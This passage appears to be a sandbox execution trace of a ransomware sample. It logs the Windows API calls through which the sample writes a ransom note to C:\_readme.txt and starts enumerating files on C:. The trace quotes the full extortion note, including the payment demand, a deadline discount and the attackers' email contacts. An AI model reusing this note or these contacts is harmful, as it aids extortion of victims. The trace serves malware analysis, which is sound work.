RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.749] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.749] PathFindFileNameW (pszPath="") returned="" [0093.749] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.750] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x335e120 [0093.750] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.751] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x335e120 [0093.751] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0093.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0093.751] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0093.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.752] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.752] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0093.752] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.754] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.754] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.755] CloseHandle (hObject=0x5c8) returned 1 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.760] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x670618 [0093.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x33304c8 [0093.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.760] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0093.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.761] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0093.761] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0093.761] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338dc8 [0093.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.762] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5ee0 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0093.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5ee0 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f70 | out: 